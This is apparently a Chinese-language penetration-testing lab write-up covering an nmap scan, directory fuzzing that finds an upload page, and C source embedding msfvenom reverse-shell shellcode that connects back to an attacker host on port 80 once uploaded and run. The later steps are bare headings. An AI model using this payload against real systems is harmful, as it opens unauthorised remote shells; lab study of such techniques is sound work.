命令:nmap -A -Pn 192.168.243.171
Nmap initial output
Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-07-17 01:03 EDT
Nmap scan report for 192.168.243.171
Host is up (0.21s latency).
Not shown: 948 filtered tcp ports (no-response), 49 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 0c:f7:57:49:fc:d4:4e:73:97:2c:25:a2:6a:36:5b:2c (RSA)
| 256 87:35:fd:bc:0a:69:ff:e7:7f:4c:54:c7:bd:29:1d:b9 (ECDSA)
|_ 256 2d:8b:f2:70:c4:57:44:62:d5:80:d6:0b:6e:31:a9:75 (ED25519)
**80/tcp open http Apache httpd 2.4.37 ((centos))**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
|_http-server-header: Apache/2.4.37 (centos)
9090/tcp closed zeus-admin
Aggressive OS guesses: Linux 4.4 (92%), Linux 4.9 (91%), Linux 3.10 - 3.12 (90%), Linux 4.0 (89%), Linux 3.10 - 3.16 (88%), Linux 3.11 - 4.1 (88%), Linux 2.6.32 (88%), Linux 3.4 (88%), Linux 3.5 (88%), Linux 4.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 9090/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.172
2 205.23 ms 192.168.243.171
访问80端口,只显示apache的首页,需要fuzz一下可能的页面。但是很奇怪的是,用了好几个字典,gobuster,ffuf都没找到目标页面。
ffuf -u [<http://192.168.243.171/FUZZ>](<http://192.168.243.171/FUZZ>) -w /usr/share/dirb/wordlists/big.txt
ffuf -u [<http://192.168.243.171/FUZZ>](<http://192.168.243.171/FUZZ>) -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u [<http://192.168.243.171/>](<http://192.168.243.171/>) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
以上三个命令都没找到需要的,最后是gobuster指定后缀才找到
gobuster dir -u [<http://192.168.243.171>](<http://192.168.243.171/>) -w /usr/share/wordlists/dirb/common.txt -e -x html
访问:http://192.168.243.171/upload.html
存在上传,根据要求,编写如下代码:(参照教材P404)
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
// To compile:
// gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
// gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=80 -f c
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x00\x50\xc0\xa8\x31\xf3\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
int main(void)
{
printf("I love programming.");
// Fork a new thread based on the current one
if (fork() == 0)
{
// Execute shellcode in the new thread
intptr_t pagesize = sysconf(_SC_PAGESIZE);
// Make memory executable (required in libs)
if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
// Handle error
perror("mprotect");
return -1;
}
// Cast and execute
int (*ret)() = (int(*)())buf;
ret();
}
else
{
printf("[Hijacked] Returning from function...\n");
}
// This shouldn't really execute
printf("[Hijacked] Returning from main...\n");
return 3;
}
编译命令:gcc -Wall -fPIC -z execstack -o rev.elf rev.c
上传,得到返回的shell:
产生一个伪终端:
查找flag: